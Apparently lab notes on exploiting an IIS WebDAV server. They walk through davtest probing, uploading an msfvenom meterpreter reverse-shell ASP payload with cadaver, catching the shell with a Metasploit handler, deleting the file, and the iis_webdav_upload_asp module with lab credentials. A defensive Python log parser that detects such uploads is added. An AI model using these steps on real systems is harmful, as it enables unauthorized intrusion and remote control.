msfvenom,metasploit
First, use the davtest command to check which file types the server accepts and executes:
davtest -auth username:password -url http://ip address/webdav
Msfvenom
In this case the server also supports .asp files, so generate an ASP payload using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(your ip) LPORT=1234 -f asp > shell.asp
Use cadaver to upload the generated shell.asp payload to the /webdav directory:
cadaver http://10.4.18.218/webdav
put /root/shell.asp
Before executing shell.asp, set up a listener/handler that will receive the reverse connection from the target and send the stage that provides a meterpreter session when executed.
Open a new terminal tab and run Metasploit with database support
service postgresql start && msfconsole
Set up a Metasploit handler, using the same payload, LHOST and LPORT provided to msfvenom:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.80.4
set LPORT 1234
run
Open the http://10.4.18.218/webdav link in the browser and click on the shell.asp file. The Meterpreter session will be opened.

Use cadaver to delete the uploaded shell.asp file:
cadaver http://10.4.18.218/webdav
delete shell.asp
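From the defender's side, the upload, execute, delete sequence above leaves a recognizable trail in the IIS access log. The following is an added example (not part of the original notes) that parses W3C-format log lines and flags script files that were PUT into /webdav and later requested; the sample log, the chosen log fields and the extension list are constructed assumptions.

```python
"""Flag WebDAV script drops in IIS W3C logs: PUT of a script file, later GET of it."""
from collections import namedtuple

SCRIPT_EXT = (".asp", ".aspx", ".asa", ".cer")  # assumption: extensions IIS may execute
WEBDAV_PREFIX = "/webdav/"                       # writable directory named in the notes

Finding = namedtuple("Finding", "uri uploader uploaded_at executed_by executed_at deleted")

# Constructed sample log (addresses, users and times are made up for illustration).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-01-10 09:14:02 PROPFIND /webdav/ bob 10.10.80.4 207
2024-01-10 09:14:31 PUT /webdav/shell.asp bob 10.10.80.4 201
2024-01-10 09:15:07 GET /webdav/shell.asp bob 10.10.80.4 200
2024-01-10 09:16:40 DELETE /webdav/shell.asp bob 10.10.80.4 200
2024-01-10 09:20:11 PUT /webdav/report.txt alice 10.10.80.9 201
2024-01-10 09:21:00 GET /webdav/report.txt alice 10.10.80.9 200
2024-01-10 09:25:00 PUT /webdav/test.asp carol 10.10.80.7 403
"""

def parse(log_text):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_script_drops(log_text):
    """Return a Finding for every successfully uploaded script that was later requested."""
    uploads, findings = {}, {}
    for r in parse(log_text):
        uri, status = r["cs-uri-stem"].lower(), int(r["sc-status"])
        when = f'{r["date"]} {r["time"]}'
        if not (uri.startswith(WEBDAV_PREFIX) and uri.endswith(SCRIPT_EXT)):
            continue
        if r["cs-method"] == "PUT" and status in (200, 201, 204):
            uploads[uri] = (r["c-ip"], when)
        elif r["cs-method"] in ("GET", "POST") and status == 200 and uri in uploads:
            findings[uri] = Finding(uri, *uploads[uri], r["c-ip"], when, False)
        elif r["cs-method"] == "DELETE" and uri in findings:
            findings[uri] = findings[uri]._replace(deleted=True)  # cleanup after execution
    return list(findings.values())

if __name__ == "__main__":
    for finding in find_script_drops(SAMPLE_LOG):
        print(finding)
```

A finding with deleted set to True means the file is no longer on disk, so the log entry may be the only remaining evidence of the upload.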
Metasploit - automatic
Use the Metasploit iis_webdav_upload_asp module to get a meterpreter session on the target system.
service postgresql start && msfconsole
search iis upload
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.4.22.96 # Lab reset = IP changed
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit.asp
exploit
You will be provided with a meterpreter session.